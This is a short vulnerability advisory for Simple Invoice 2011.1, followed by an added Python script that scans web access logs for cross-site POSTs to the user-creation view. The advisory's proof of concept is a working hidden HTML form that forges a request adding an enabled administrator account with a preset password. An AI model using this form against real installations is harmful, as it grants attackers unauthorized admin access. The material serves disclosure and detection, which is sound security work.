Simple Invoice version 2011.1 suffers from a cross-site request forgery vulnerability.
7f7ed221cb72a656ccbb183689f5445ad84650f1578c24e9e6ad537e5385d8c1
# Affected software: simple invoice
# Type of vulnerability: adding admin user via CSRF
# URL: simpleinvoices.org
# Discovered by: provensec
# Website: provensec.com
# Version: 2011.1
# Proof of concept
<html>
<body>
<form action="http://demo.simpleinvoices.org/index.php?module=user&view=add" method="POST">
<input type="hidden" name="email" value="aaaa@gmail.com" />
<input type="hidden" name="role" value="1" />
<input type="hidden" name="password_field" value="lalala123@" />
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="submit" value="Insert User" />
<input type="hidden" name="op" value="insert_user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
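
A log check for requests shaped like the proof of concept above, as an added example that is not part of the original advisory: it scans combined-format access-log lines for POSTs to the `module=user&view=add` view whose Referer is missing or points at another host. The log lines, the `APP_HOST` value and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the application is served from the host used in the PoC URL.
APP_HOST = "demo.simpleinvoices.org"

# Apache/nginx "combined" format: ip - - [ts] "METHOD target PROTO" status size "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def is_user_add(target):
    """True if the request target is the user-creation view named in the advisory."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    return (parts.path.endswith("/index.php")
            and qs.get("module") == ["user"] and qs.get("view") == ["add"])

def classify(line, app_host=APP_HOST):
    """Return None for irrelevant lines, else (verdict, client_ip, referer)."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or not is_user_add(m["target"]):
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        verdict = "no-referer"   # header stripped or suppressed: needs manual review
    elif (urlsplit(referer).hostname or "").lower() == app_host:
        verdict = "same-site"    # submitted from the application's own form
    else:
        verdict = "cross-site"   # form was submitted from a page on another host
    return verdict, m["ip"], referer

def suspicious(lines):
    return [r for r in map(classify, lines) if r and r[0] != "same-site"]

# Constructed sample log lines (documentation IP ranges, not from a real server).
_POST = '"POST /index.php?module=user&view=add HTTP/1.1" 302 512'
SAMPLE_LOG = [
    f'203.0.113.10 - - [12/Mar/2014:10:01:02 +0000] {_POST} "http://demo.simpleinvoices.org/index.php?module=user&view=add" "Mozilla/5.0"',
    f'203.0.113.10 - - [12/Mar/2014:10:05:40 +0000] {_POST} "http://forum.example.net/thread/42" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Mar/2014:10:07:15 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [12/Mar/2014:10:09:31 +0000] {_POST} "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, ip, ref in suspicious(SAMPLE_LOG):
        print(f"{verdict:<11} client={ip} referer={ref}")
```

A cross-site hit followed by an account the administrator did not create is the pattern to review; a missing Referer on its own can also come from browser privacy settings.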